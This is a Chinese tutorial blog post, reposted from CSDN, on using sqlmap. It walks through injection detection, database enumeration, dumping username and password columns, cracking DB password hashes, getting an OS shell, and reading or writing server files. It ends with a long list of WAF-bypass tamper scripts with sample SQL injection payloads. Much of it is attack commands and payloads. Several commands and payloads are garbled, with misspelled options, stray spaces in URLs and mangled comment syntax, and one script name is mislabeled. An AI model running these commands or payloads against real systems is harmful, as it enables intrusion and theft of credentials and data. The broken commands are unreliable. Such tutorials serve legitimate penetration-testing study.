0


sqlmap详解


title: 渗透测试工具-sqlmap详解
date: 2023-1-13 11 :17 :36
tags: 渗透测试
categories: 渗透从入门到入土
author:Abyssaler


谈到渗透测试就离不开sql注入,谈到sql注入就离不开sqlmap,本文旨在介绍sqlmap这款强大的自动化sql注入工具的使用,未来也会根据自己实际遇到的情况进行更新,话不多说,直接开整

sqlmap介绍

其实对于sqlmap这款工具不需要过多介绍了,网上一搜一大把,这里还是简单提一下

sqlmap是一个自动化的sql注入工具,其主要功能是扫描、发现并利用给定URL的SQL注入漏洞,内置了很多绕过插件,支持的数据库有MySQL, Oracle,PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird,Sybase和SAP MaxDB。
sqlmap支持五种不同的注入模式:

  • 基于布尔的盲注,即可以根据返回页面判断条件真假的注入;
  • 基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断;
  • 基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中;
  • 联合查询注入,可以使用union的情况下的注入;
  • 堆查询注入,可以同时执行多条语句的执行时的注入

比较详细的sqlmap配置及使用文章

https://blog.csdn.net/qq_51768842/article/details/123485836?spm=1001.2014.3001.5502

https://zhuanlan.zhihu.com/p/377428620

sqlmap入门

注意我这里是在kali环境下使用的sqlmap,所以可以直接使用,Windows需要添加环境变量等操作

判断是否存在注入

假设目标的url是

http://127.0.0.1/sql/Less-1/?id=1

那么判断命令就是

sqlmap -u http://127.0.0.1/sql/Less-1/?id=1 

当注入点后面参数大于两个是,需要加双引号,如下:

sqlmap -u "http://127.0.0.1/sql/Less-1/?id=1&uid=2"

判断文本中的请求是否存在注入

从文件中加载HTTP请求,SQLMap可 以从一个文本文件中获取HTTP请求,这样就可以不设置其他参数(如cookie、POST数据等),txt文件中的内容为Web数据包,

这个文本文件通常可以用burp suite生成

image-20230201104729660

判断是否存在注入的命令如下所示,运行后的结果如图所示,-r- -般在存在cookie注入时使用。

sqlmap -r sql.txt

image-20230201111757018

查询当前用户的所有数据库

sqlmap.py -u http://192. 168.1.104/sq11/Less-1/?id=1 --dbs

当继续注入时,–dbs缩写成 -D xxx ,其意思是在 xx数据库中继续查询其他数据

获取数据库中的表名

sq1map.py -u "http://192.168.1.7/sq1/union. php?id=1" -D dkeye --tables

当继续注入时,–tables缩 写成-T,意思是在某表中继续查询。

获取表中的字段名

sqlmap.py -u "http://192.168.1. 7/sq1/ union. php?id=1" -D dkeye -T user_ info --columns

在后续的注入中,–columns缩写成-C。

获取字段内容

sqlmap.py -U "http:/ /192.168.1.7/sq1/union. php?id=1" -D dkeye -T user_ info -C username , password -- dump

获取数据库的所有用户

该命令的作用是列出数据库的所有用户,如下所示。在当前用户有权限读取包含所有用户的表的权限时,使用该命令就可以列出所有管理用户。

sqlmap.py -u "http://192. 168.1.7/sq1/union. php?id=1" --users

获取数据库用户的密码

该命令的作用是列出数据库用户的密码,如下所示,如果当前用户有读取包含用户密码的权限, SQLMap会先列举出用户,然后列出Hash ,并尝试破解

sqlmap.py -u http://192.168.1.7/sq1/union. php?id=1" --passwords

获取当前网站的数据库的名称

sqlmap.py -u "http://192.168.1.7/sq1/union. php?id=1" --current-db

获取当前网站数据库的用户名称

sqlmap.py -u http://192.168.1.7/sq1/union. php?id=1" --current-user

sqlmap进阶

具体可以参看Web安全攻防:渗透测试实战指南中的sqlmap进阶篇,篇幅太长就不详解了

1>探测等级: --level 5

–level 5 指的是需要执行的测试等级

一共有5个等级(1-5) 不加 level 时,默认是1

5级包含的payload最多,会自动破解出cookie、XFF等头部注入,相对应他的速度也比较慢。

level=2 http cookie会测试

level=3 http user-agent/referer头会测试

在不能确定哪个payload或参数为注入点时,建议使用高的level值。

2>当前用户是否为管理权限: --is -dba

返回true则为是管理权限,否则不是

3>列出数据库管理员角色: --roles

注意:只适用于当前数据库是oracle的时候

4>HTTP Referer头: --referer

当level设置为3时,会尝试referer注入

也可以使用referer命令来欺骗 例如:

–referer 域名(https://www.baidu.com)

5>运行自定义sql语句:–sql -shell

例如:sqlmap.py -u “http://192.168.1.xxx/sql1/union.php?id=1” --sql -shell

6>运行任意操作系统命令: --os -cmd

​ --os -shell

用 --os -shell参数可以模拟一个真实的shell,输入想执行的命令

支持asp、asp.net、jsp、php四种语言

7>从数据库服务器中读取文件 --file-read ” 路径“

8>上传文件到数据库服务器中 --file-write

​ --file-dest

用于写入本地文件到服务器中,当数据库为mysql、postgresql、microsoft sql server,且当前用户有权限使用特定函数时,上传的文件可以是文本也可以是二进制文件。

6.sqlmap自带绕过脚本tamper的讲解

sqlmap在默认情况下除了使用char()函数防止出现单引号,没有对注入的数据进行修改。

tamper参数对数据做修改来绕过WAF等设备,其中大部分脚本主要用正则模块替换攻击载荷字符编码的方式尝试绕过WAF的检测规则。

常用的tamper脚本:

apostrophemask.py

适用数据库:ALL

作用:将引号替换为utf-8,用于过滤单引号

使用脚本前:tamper(“1 AND ‘1’='1”)

使用脚本后:1 AND %EF%BC%871%EF%BC%87=%EF%BC%871

base64encode.py

适用数据库:ALL

作用:替换为base64编码

使用脚本前:tamper(“1’ AND SLEEP(5)#”)

使用脚本后:MScgQU5EIFNMRUVQKDUpIw==

multiplespaces.py

适用数据库:ALL

作用:围绕sql关键字添加多个空格

使用脚本前:tamper(‘1 UNION SELECT foobar’)

使用脚本后:1 UNION SELECT foobar

space2plus.py

适用数据库:ALL

作用:用加号替换空格

使用脚本前:tamper(‘SELECT id FROM users’)

使用脚本后:SELECT+id+FROM+users

nonrecursivereplacement.py

适用数据库:ALL

作用:作为双重查询语句,用双重语句替代预定义的sql关键字(适用于非常弱的自定义过滤器,例如将select替换为空)

使用脚本前:tamper(‘1 UNION SELECT 2–’)

使用脚本后:1 UNIOUNIONN SELESELECTCT 2–

space2randomblank.py

适用数据库:ALL

作用:将空格替换为其他有效字符

使用脚本前:tamper(‘SELECT id FROM users’)

使用脚本后:SELECT%0Did%0DFROM%0Ausers

unionalltounion.py

适用数据库:ALL

作用:将union allselect 替换为unionselect

使用脚本前:tamper(‘-1 UNION ALL SELECT’)

使用脚本后:-1 UNION SELECT

securesphere.py

适用数据库:ALL

作用:追加特定的字符串

使用脚本前:tamper(‘1 AND 1=1’)

使用脚本后:1 AND 1=1 and ‘0having’=‘0having’

space2dash.py

适用数据库:ALL

作用:将空格替换为–,并添加一个随机字符串和换行符

使用脚本前:tamper(‘1 AND 9227=9227’)

使用脚本后:1–nVNaVoPYeva%0AAND–ngNvzqu%0A9227=9227

space2mssqlblank.py

适用数据库:Microsoft SQL Server

测试通过数据库:Microsoft SQL Server 2000、Microsoft SQL Server 2005

作用:将空格随机替换为其他空格符号(‘%01’, ‘%02’, ‘%03’, ‘%04’, ‘%05’, ‘%06’, ‘%07’, ‘%08’, ‘%09’, ‘%0B’, ‘%0C’, ‘%0D’, ‘%0E’, ‘%0F’, ‘%0A’)

使用脚本前:tamper(‘SELECT id FROM users’)

使用脚本后:SELECT%0Eid%0DFROM%07users

between.py

测试通过数据库:Microsoft SQL Server 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0

作用:用NOT BETWEEN 0 AND #替换>

使用脚本前:tamper(‘1 AND A > B–’)

使用脚本后:1 AND A NOT BETWEEN 0 AND B–

percentage.py

适用数据库:ASP

测试通过数据库:Microsoft SQL Server 2000, 2005、MySQL 5.1.56, 5.5.11、PostgreSQL 9.0

作用:在每个字符前添加一个%

使用脚本前:tamper(‘SELECT FIELD FROM TABLE’)

使用脚本后:%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E

sp_password.py

适用数据库:MSSQL

作用:从T-SQL日志的自动迷糊处理的有效载荷中追加sp_password

使用脚本前:tamper('1 AND 9227=9227-- ')

使用脚本后:1 AND 9227=9227-- sp_password

charencode.py

测试通过数据库:Microsoft SQL Server 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0

作用:对给定的payload全部字符使用url编码(不处理已经编码的字符)

使用脚本前:tamper(‘SELECT FIELD FROM%20TABLE’)

使用脚本后:%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45

randomcase.py

测试通过数据库:Microsoft SQL Server 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0

作用:随机大小写

使用脚本前:tamper(‘INSERT’)

使用脚本后:INseRt

charunicodeencode.py

适用数据库:ASP、ASP.NET

测试通过数据库:Microsoft SQL Server 2000/2005、MySQL 5.1.56、PostgreSQL 9.0.3

作用:适用字符串的unicode编码

使用脚本前:tamper(‘SELECT FIELD%20FROM TABLE’)

使用脚本后:%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045

space2comment.py

测试通过数据库:Microsoft SQL Server 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0

作用:将空格替换为/**/

使用脚本前:tamper(‘SELECT id FROM users’)

使用脚本后:SELECT//id//FROM/**/users

equaltolike.py

测试通过数据库:Microsoft SQL Server 2005、MySQL 4, 5.0 and 5.5

作用:将=替换为LIKE

使用脚本前:tamper(‘SELECT * FROM users WHERE id=1’)

使用脚本后:SELECT * FROM users WHERE id LIKE 1

equaltolike.py

测试通过数据库:MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0

作用:将>替换为GREATEST,绕过对>的过滤

使用脚本前:tamper(‘1 AND A > B’)

使用脚本后:1 AND GREATEST(A,B+1)=A

ifnull2ifisnull.py

适用数据库:MySQL、SQLite (possibly)、SAP MaxDB (possibly)

测试通过数据库:MySQL 5.0 and 5.5

作用:将类似于IFNULL(A, B)替换为IF(ISNULL(A), B, A),绕过对IFNULL的过滤

使用脚本前:tamper(‘IFNULL(1, 2)’)

使用脚本后:IF(ISNULL(1),2,1)

modsecurityversioned.py

适用数据库:MySQL

测试通过数据库:MySQL 5.0

作用:过滤空格,使用mysql内联注释的方式进行注入

使用脚本前:tamper(‘1 AND 2>1–’)

使用脚本后:1 /!30874AND 2>1/–

space2mysqlblank.py

适用数据库:MySQL

测试通过数据库:MySQL 5.1

作用:将空格替换为其他空格符号(‘%09’, ‘%0A’, ‘%0C’, ‘%0D’, ‘%0B’)

使用脚本前:tamper(‘SELECT id FROM users’)

使用脚本后:SELECT%0Bid%0DFROM%0Cusers

modsecurityzeroversioned.py

适用数据库:MySQL

测试通过数据库:MySQL 5.0

作用:使用内联注释方式(/!00000/)进行注入

使用脚本前:tamper(‘1 AND 2>1–’)

使用脚本后:1 /!00000AND 2>1/–

space2mysqldash.py

适用数据库:MySQL、MSSQL

作用:将空格替换为 – ,并追随一个换行符

使用脚本前:tamper(‘1 AND 9227=9227’)

使用脚本后:1–%0AAND–%0A9227=9227

bluecoat.py

适用数据库:Blue Coat SGOS

测试通过数据库:MySQL 5.1,、SGOS

作用:在sql语句之后用有效的随机空白字符替换空格符,随后用LIKE替换=

使用脚本前:tamper(‘SELECT id FROM users where id = 1’)

使用脚本后:SELECT%09id FROM users where id LIKE 1

versionedkeywords.py

适用数据库:MySQL

测试通过数据库:MySQL 4.0.18, 5.1.56, 5.5.11

作用:注释绕过

使用脚本前:tamper(‘1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#’)

使用脚本后:1/!UNION//!ALL//!SELECT//!NULL/,/!NULL/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/!AS//!CHAR/),CHAR(32)),CHAR(58,100,114,117,58))#

halfversionedmorekeywords.py

适用数据库:MySQL < 5.1

测试通过数据库:MySQL 4.0.18/5.0.22

作用:在每个关键字前添加mysql版本注释

使用脚本前:tamper(“value’ UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND ‘QDWa’='QDWa”)

使用脚本后:value’/!0UNION/!0ALL/!0SELECT/!0CONCAT(/!0CHAR(58,107,112,113,58),/!0IFNULL(CAST(/!0CURRENT_USER()/!0AS/!0CHAR),/!0CHAR(32)),/!0CHAR(58,97,110,121,58)),/!0NULL,/!0NULL#/!0AND ‘QDWa’='QDWa

space2morehash.py

适用数据库:MySQL >= 5.1.13

测试通过数据库:MySQL 5.1.41

作用:将空格替换为#,并添加一个随机字符串和换行符

使用脚本前:tamper(‘1 AND 9227=9227’)

使用脚本后:1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227

apostrophenullencode.py

适用数据库:ALL

作用:用非法双字节Unicode字符替换单引号

使用脚本前:tamper(“1 AND ‘1’='1”)

使用脚本后:1 AND %00%271%00%27=%00%271

appendnullbyte.py

适用数据库:ALL

作用:在有效载荷的结束位置加载null字节字符编码

使用脚本前:tamper(‘1 AND 1=1’)

使用脚本后:1 AND 1=1%00

chardoubleencode.py

适用数据库:ALL

作用:对给定的payload全部字符使用双重url编码(不处理已经编码的字符)

使用脚本前:tamper(‘SELECT FIELD FROM%20TABLE’)

使用脚本后:%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545

unmagicquotes.py

适用数据库:ALL

作用:用一个多字节组合%bf%27和末尾通用注释一起替换空格

使用脚本前:tamper(“1’ AND 1=1”)

使用脚本后:1%bf%27 AND 1=1–

randomcomments.py

适用数据库:ALL

作用:用注释符分割sql关键字

使用脚本前:tamper(‘INSERT’)

使用脚本后:I//N//SERT


本文转载自: https://blog.csdn.net/weixin_45349299/article/details/129006052
版权归原作者 Abyssaler 所有, 如有侵权,请联系我们删除。

“sqlmap详解”的评论:

还没有评论